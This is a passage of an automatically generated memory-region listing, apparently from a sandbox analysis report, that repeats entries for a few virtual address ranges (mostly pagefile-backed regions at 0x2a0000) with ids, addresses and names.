region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6010 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6011 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6012 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6013 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6014 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6015 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6016 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6017 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6018 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6019 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6020 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6021 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6022 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6023 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6024 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6025 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6026 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6027 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6028 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6029 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6030 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6031 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6032 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6033 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6034 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6035 start_va = 0x2a0000 
end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6036 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6037 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6038 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6039 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6040 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6041 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6042 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6043 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6044 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6045 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6046 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6047 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6048 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6049 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6050 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6051 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6052 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6053 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6054 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6055 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6056 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6057 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6163 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6164 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6165 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: 
id = 6166 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6167 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6168 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6169 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6170 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6171 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6172 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6173 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6174 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6175 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6176 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6177 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6178 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 6179 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6180 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6181 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6182 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6183 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6184 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6185 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6186 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6187 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6188 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6189 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6190 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6191 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 6192 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6193 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6194 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6195 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6196 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6197 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6198 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6199 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6200 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6201 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6202 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6203 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6204 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6205 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6206 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6207 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6208 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6209 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6210 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6211 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6212 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6213 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6214 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6215 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6216 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6217 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 6218 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6219 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6220 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6221 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6222 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6223 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6224 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6225 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6226 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6227 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6228 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6229 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6230 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6231 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6232 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6233 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6234 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6235 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6236 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6237 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6238 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6239 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6240 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6241 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6242 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6243 start_va = 0x2a0000 
end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6244 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6245 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6246 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6247 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6248 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6249 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6250 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6251 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6252 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6253 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6254 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6255 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6256 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6257 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6258 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6259 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6260 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6261 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6262 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6263 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6264 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6265 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6266 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6267 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6268 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 6374 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6375 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6376 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 6377 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6378 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6379 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6380 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6381 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6382 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6383 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6384 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6385 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6386 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 6387 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6388 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6389 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6390 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6391 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6392 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6393 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6394 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6395 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6396 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6397 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6398 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6399 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 6400 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6401 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6402 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6403 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6404 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6405 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6406 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6407 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6408 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6409 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6410 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6411 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6412 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
